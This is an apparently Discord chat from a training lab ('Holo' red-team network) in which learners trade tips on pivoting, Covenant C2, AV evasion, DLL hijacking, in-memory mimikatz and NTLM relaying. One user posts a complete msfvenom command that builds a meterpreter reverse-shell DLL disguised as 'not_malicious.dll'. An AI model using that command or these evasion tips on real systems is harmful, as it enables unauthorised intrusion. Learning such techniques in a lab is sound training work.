
river cradle
#

That won't work with exes

livid shoal
#

oh

river cradle
#

Invoke expression / IEX is like eval for powershell

nocturne pulsar
#

yeah, downloadstring kind of makes it sound like it needs a string

river cradle
#

To run mimikatz from memory you'd need a wrapper script which in turn can be powershell

nocturne pulsar
#

so base64 encode it?

river cradle
#

I have one like that in my collection

nocturne pulsar
#

how do you decode into memory?

river cradle
#

SO depending on the binary type you might have different methods

#

For c# ones you might just only need to load their classes and invoke straight from powershell

livid shoal
#

szy also one doubt. when i placed the covenant generated stager it was being detected by defender and not executed but when i placed a simple rev shell script it gave me a shell?

#

any idea why it was happening? i had to stick to a netcat shell

river cradle
#

For normal binaries you might need to load them into memory and execute them, the way the script i have is doing it is using reflective pe injection

river cradle
river cradle
#

that was executed remotely with iex?

river cradle
#

I don't think it should do that but it is possible i was wrong and defender does scan it too

nocturne pulsar
#

@river cradle can i dm you?

livid shoal
river cradle
vague briar
#

Hi everyone! When the access days are over, is it possible to re-enter the hall?

glacial temple
#

You’re able to join back

livid shoal
#

ad module is not present

#

:(

#

is that a bug?

#

for anyone having the same issue

livid shoal
#

@nocturne pulsar did u find the dll

nocturne pulsar
#

@livid shoal yeah, im an idiot

#

i figured it out though

livid shoal
#

in the get-scheduledtask ig?

#

right?

nocturne pulsar
#

look in task manager

livid shoal
#

ohhh

nocturne pulsar
#

there will be something that is running like 30 times

livid shoal
#

that why

#

ohh so that is it

daring crest
#

Hi, I'm connected to the VPN network Hololive, but I can't ping servers. Somebody can help me plz ?

nocturne pulsar
#

i was an idiot and made an x64 dll, when it was clear as day that i should have made an x86 one

livid shoal
#

🤔

#

for the question

#

task

#

nvm

#

got it

radiant spindle
#

i'm stuck on task 23, i've done pivoting. Can't ping the windows server from anywhere actually, neither from linux-1 or attacking machine even though network is up.
and i really don't have any clue where i'm suppose to get a foothold on DC1.

#

What exactly i'm supposed on task 23

midnight ravine
#

humm thinkw

#

are you sure you're connected to internet ?

glacial temple
radiant spindle
#

bruhh

glacial temple
#

AV

radiant spindle
#

then what exactly i've to do on task 23

river cradle
#

23? set up the C2
if you mean 22 then you're supposed to set up a pivot to be able to reach the internal network

radiant spindle
#

we cn't ping it, justified with AV. we can't open website on that ad server. How exactly we are supposed to go ahead in network

river cradle
#

which server are you trying to reach?

radiant spindle
#

windows

river cradle
#

yeah but which one, there are couple

radiant spindle
#

central dc

livid shoal
radiant spindle
#

DC-SRV01

river cradle
#

DC won't have a webserver, if you want to check if it's available scan 135/445

radiant spindle
#

tried it didn't got any machine up

river cradle
#

after the pivot you're supposed to set up the C2 and then you'll be instructed to start working with S-srv01

nocturne pulsar
livid shoal
#

oops

radiant spindle
#

ok, will try it maybe i am just exhausted

livid shoal
#

or do i need to download it from the machine itself

livid shoal
#

we need the

#

original file?

#

right?

nocturne pulsar
#

you need that file to figure out what dll's it cant find

livid shoal
#

?

#

to view the processes

nocturne pulsar
#

not sure if its the same

#

it could be a different version

#

best to use the one on the machine

livid shoal
nocturne pulsar
#

i used scp on the windows machine

#

you can scp it back to your own machine

#

you could also stick it somewhere where you can get it with SMB

livid shoal
#

@nocturne pulsar can i dm u?

nocturne pulsar
#

yeah

vague briar
hollow steepleBOT
#

Gave +1 Rep to @glacial temple

livid shoal
#

I placed every possible dll i found but still waiting for shell? am i doing something wrong

lone spruce
#

what DLLs did you find?

#

It can be found in pretty much the first result in a decent google search

livid shoal
livid shoal
#

still waiting for shell :/

gloomy ravine
#

I got shell once in task 12, not getting now.

lone spruce
#

How did you create your dll? Does your dll bypass AV? Have you tested it on a separate system as recommended?

livid shoal
#

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=7777 -f dll -o not_malicious.dll

#

this one

gloomy ravine
gloomy ravine
lone spruce
#

Did you test it?

#

You don’t just play Russian roulette in an engagement

livid shoal
#

ah

#

yea i forgot that this time

livid shoal
tepid halo
#

Task 34, "To download our malicious grunt, we can set up an HTTP server on our attacking machine using python, updog, etc and use iex or Invoke-WebRequest to make a remote call to our server. Find the download payload below." is written twice

gloomy ravine
lone spruce
#

Maybe I don’t know there’s a lot happening

tepid halo
#

There are probably several holo networks, you should tell the IP

lone spruce
#

it can help if you provide more detail: subnet, last reset, etc

livid shoal
gloomy ravine
#

admin.holo.live are you guys able to login??

tepid halo
livid shoal
#

subnet

#

10.200.x.0 what is x for u? @gloomy ravine

livid shoal
#

yeah thats the problematic one

river cradle
#

is www down again on it?

#

or is it something else

tepid halo
#

I just got a shell in S-SRV01 with a 1 liner reverse powershell, skipping the whole Obfuscation/AV-Evasion stuff. Is this expected to happen? Is the whole AV Evasion stuff there because the Covenant payload raises lots of flags?

gloomy ravine
livid shoal
tepid halo
#

Nope, nothing

livid shoal
river cradle
livid shoal
#

maybe someone disabled amsi before you

tepid halo
tepid halo
livid shoal
#

^^^

river cradle
#

🙂

livid shoal
#

@river cradle szy a little help 👀 can you tell something to bypass av for the dll. stuck on it for quite a bit

river cradle
#

can't help with that atm 😅

livid shoal
#

ah np

lone spruce
livid shoal
#

i did with the

#

powershell

#

script

#

not sure about this one

lone spruce
#

I mean it went over extensively how to clean covenant so

livid shoal
lone spruce
#

of course it creates a lot of red flags lol that’s why you clean it

livid shoal
#

av was disabled

#

still

lone spruce
#

Could’ve been a bunch of reasons who knows

livid shoal
#

yea

lone spruce
#

and by test I didn’t mean test against AV

#

have you tried running the application on a separate machine and seeing if the dll gets called

#

ie popping a shell on your own windows VM

livid shoal
livid shoal
#

poppin up

#

i tried getting a reverse shell from the same machine to the same machine

wind bobcat
#

Side note for those who have gotten every flag except S-SRV02 - I'm actively checking to see who's at 105/106 and will DM you the flag on THM until the issue gets resolved 🙂

livid shoal
#

@wind bobcat hello so i finally reached to ntlm relaying part. I was having a problem can i ask if u are free?

wind bobcat
#

about to sleep, ask away and I'll get to you first thing in the morning

livid shoal
radiant spindle
#

I can't access web server on S-SRV01 under task 27, and can't find any open ports as well with nmap

#

all ports scan is going on

#

and on default ports 80, 8080 tried accessing the website but nope

tepid halo
#

Whats the difference in a Covenant listener between the Bind Address port and the connect port?

river cradle
river cradle
radiant spindle
#

yup

river cradle
#

which one

radiant spindle
#

chisel

river cradle
#

then you need to run nmap through that socks proxy from chisel

#

proxychains <nmap command here>

#

and ofc change the proxychains config before that

radiant spindle
#

did that added 127.0.0.1:1080

#

got this address from chisel

river cradle
#

yeah so now you should be able to run nmap through proxychains

radiant spindle
#

i forgot to run browser with proxychains

#

damm, thanks 🙂

radiant spindle
#

for S-SRV01 when we try to reset password, i just have two users which i got initially from db dump

#

i tried both. just don't get the token out of it

heavy lion
#

hmmm I broke the shell trying to stabilizing it at task 13 (admin.holo.live) and I just closed my terminal, now the page at dashboard seems unresponsive, any way to get myself out of that situation?

radiant spindle
#

It uses php session ID to run dashboard

#

So I you broke the shell restart the browser and repeat steps

#

It will work

lone spruce
radiant spindle
#

I did that with Nmap chissel

lone spruce
#

Oh you used chisel in which case szy already answered

radiant spindle
#

Got ports

#

But Don't have any users

lone spruce
#

TLDR don’t heckin scan over a proxy bad bad bad

radiant spindle
#

I am stuck on this where we are supposed to get a token from reset password

lone spruce
#

Follow the tasks

#

it says exactly where to get the token from

hollow steepleBOT
#

Gave +1 Rep to @radiant spindle

radiant spindle
#

I went in network but didn't had userd

#

All I got was user not found and token was blank

lone spruce
#

Did you try the other user

bronze kettle
#

I got smb signing enabled on .30?
It is normal?

                                                     
|_    Message signing enabled but not required                                                                                                                             
lone spruce
#

I didn’t set up any of that side of the infra so I’m not sure but I assume it’s intended as there is a bunch of SMB witchery on that machine

#

@wind bobcat

livid shoal
#

also this doesnt works

livid shoal
#

guys psexec doesnt seem to work

livid shoal
#

nvm used smbexec

wind bobcat
# lone spruce <@!595016430102249488>

there's a script running every 60~ seconds to disable it. For whatever reason, it doesn't like being disabled on a DC. I'd wager the script broke itself, or someone rebooted the DC, or the network may have gone to sleep

nocturne pulsar
#

hey, can you DM me the last flag @wind bobcat ?

wind bobcat
#

I'll DM it on thm, 1 sec

nocturne pulsar
#

thanks @wind bobcat

hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

next kite
#

how does one use burpsuite with traffic already going through a proxy?

wind bobcat
#

sent, you'll also want to make sure you answer t47q2 haha